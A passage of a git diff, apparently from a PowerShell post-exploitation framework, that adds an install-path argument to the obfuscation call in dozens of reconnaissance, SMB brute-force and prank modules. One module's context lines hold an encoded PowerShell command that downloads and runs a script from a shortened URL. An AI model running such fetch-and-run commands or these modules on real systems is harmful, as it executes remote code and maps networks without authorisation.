helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py index 83c9bf9..056ca1c 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py @@ -79,6 +79,7 @@ class Module: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" + scriptEnd = "" if check_all: auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" if obfuscate: @@ -96,6 +97,7 @@ class Module: if password != "": scriptEnd += " -Password "+password scriptEnd += " | " + scriptEnd += " Get-SQLServerInfo" if username != "": scriptEnd += " -Username "+username @@ -104,6 +106,6 @@ class Module: if instance != "" and not check_all: scriptEnd += " -Instance "+instance if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/portscan.py b/lib/modules/powershell/situational_awareness/network/portscan.py index 336e1bf..88f7617 100644 --- a/lib/modules/powershell/situational_awareness/network/portscan.py +++ b/lib/modules/powershell/situational_awareness/network/portscan.py @@ -142,6 +142,6 @@ class Module: scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py b/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py index 77f24df..4dcd3b2 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py @@ -103,5 +103,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py index 1e81f69..866fb8d 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py @@ -97,5 +97,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py index 6d7588d..60a1ad1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py @@ -97,5 +97,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py index ab9a194..fd02dd9 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py index 2ca9d6f..1d9179a 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py b/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py index 675c30c..5e8328b 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py @@ -118,5 +118,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py b/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py index 463840f..e39406c 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py @@ -85,5 +85,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py b/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py index 0a98d22..8f2dd50 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py @@ -103,5 +103,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py b/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py index 0168052..c32c615 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py b/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py index b521180..94d2fc1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py @@ -132,5 +132,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py b/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py index f527abf..9440c57 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py @@ -92,5 +92,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py index d709597..fde07a3 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py index 4a6d5cf..0fd2bb6 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py @@ -119,5 +119,5 @@ class Module: else: script += moduleName + " " + pscript + ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed! Use ExpandObject option to expand one of the objects above such as \'System Access\'"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py index 4b7189f..c90d258 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py b/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py index 49c34ae..0e49bdc4 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py @@ -92,5 +92,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py b/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py index 4ed84c1..5b713e5 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py b/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py index 7c55217..0a0592f 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py index 28dd8ee..d4b2f82 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py index 1932b95..52ba4bc 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py @@ -109,5 +109,5 @@ class Module: script += '} | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_group.py b/lib/modules/powershell/situational_awareness/network/powerview/get_group.py index f21e51f..6157e14 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_group.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py b/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py index 398e948..bf4e24f 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py b/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py index 0fc757f..6e79356 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py @@ -108,5 +108,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py b/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py index 3422d5d..c9744d1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py @@ -87,5 +87,5 @@ class Module: script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py b/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py index 2acb7aa..ab03fc8 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py @@ -133,5 +133,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py b/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py index 15a4e90..1fc5981 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py b/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py index ce408c8..8593fdd 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py @@ -88,5 +88,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_session.py b/lib/modules/powershell/situational_awareness/network/powerview/get_session.py index feea3fb..db906f7 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_session.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_session.py @@ -87,5 +87,5 @@ class Module: script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_site.py b/lib/modules/powershell/situational_awareness/network/powerview/get_site.py index e2889bc..374e0e9 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_site.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_site.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py b/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py index cfef751..e249a34 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_user.py b/lib/modules/powershell/situational_awareness/network/powerview/get_user.py index 4ac729b..26b830c 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_user.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_user.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py b/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py index 764fc63..6bc3df3 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py @@ -92,5 +92,5 @@ class Module: script += '| ConvertTo-Csv -NoTypeInformation | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py b/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py index 3120886..055c482 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py @@ -147,5 +147,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py b/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py index 3c6379e..dfcd952 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py @@ -124,5 +124,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py b/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py index ba45584..3589dac 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py b/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py index 05631cd..a1d2d15 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py @@ -158,5 +158,5 @@ class Module: script += ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/reverse_dns.py b/lib/modules/powershell/situational_awareness/network/reverse_dns.py index 26e3069..287c4eb 100644 --- a/lib/modules/powershell/situational_awareness/network/reverse_dns.py +++ b/lib/modules/powershell/situational_awareness/network/reverse_dns.py @@ -92,6 +92,6 @@ class Module: # only return objects where HostName is not an IP (i.e. the address resolves) scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/smbautobrute.py b/lib/modules/powershell/situational_awareness/network/smbautobrute.py index 8da9d7f..a8765fa 100644 --- a/lib/modules/powershell/situational_awareness/network/smbautobrute.py +++ b/lib/modules/powershell/situational_awareness/network/smbautobrute.py @@ -130,6 +130,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/smbscanner.py b/lib/modules/powershell/situational_awareness/network/smbscanner.py index b784693..c5c133d 100644 --- a/lib/modules/powershell/situational_awareness/network/smbscanner.py +++ b/lib/modules/powershell/situational_awareness/network/smbscanner.py @@ -133,6 +133,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Invoke-SMBScanner completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/trollsploit/get_schwifty.py b/lib/modules/powershell/trollsploit/get_schwifty.py index 90abefb..6f358e1 100644 --- a/lib/modules/powershell/trollsploit/get_schwifty.py +++ b/lib/modules/powershell/trollsploit/get_schwifty.py @@ -99,5 +99,5 @@ Function Get-Schwifty script += "; 'Agent is getting schwifty!'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/message.py b/lib/modules/powershell/trollsploit/message.py index 78c31be..76b0635 100644 --- a/lib/modules/powershell/trollsploit/message.py +++ b/lib/modules/powershell/trollsploit/message.py @@ -95,5 +95,5 @@ Invoke-Message""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/process_killer.py b/lib/modules/powershell/trollsploit/process_killer.py index 25ab191..89506f4 100644 --- a/lib/modules/powershell/trollsploit/process_killer.py +++ b/lib/modules/powershell/trollsploit/process_killer.py @@ -110,5 +110,5 @@ Invoke-ProcessKiller""" script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/rick_ascii.py b/lib/modules/powershell/trollsploit/rick_ascii.py index 9cbdef0..774d580 100644 --- a/lib/modules/powershell/trollsploit/rick_ascii.py +++ b/lib/modules/powershell/trollsploit/rick_ascii.py @@ -55,5 +55,5 @@ class Module: # iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w") script = "$Null = Start-Process -WindowStyle Maximized -FilePath \"C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe\" -ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; 'Client Rick-Asciied!'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/rick_astley.py b/lib/modules/powershell/trollsploit/rick_astley.py index 733aa87..6e19f56 100644 --- a/lib/modules/powershell/trollsploit/rick_astley.py +++ b/lib/modules/powershell/trollsploit/rick_astley.py @@ -72,6 +72,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/trollsploit/thunderstruck.py b/lib/modules/powershell/trollsploit/thunderstruck.py index 041b259..00b426e 100644 --- a/lib/modules/powershell/trollsploit/thunderstruck.py +++ b/lib/modules/powershell/trollsploit/thunderstruck.py @@ -99,5 +99,5 @@ Function Invoke-Thunderstruck script += "; 'Agent Thunderstruck.'" if obfuscate: - script = 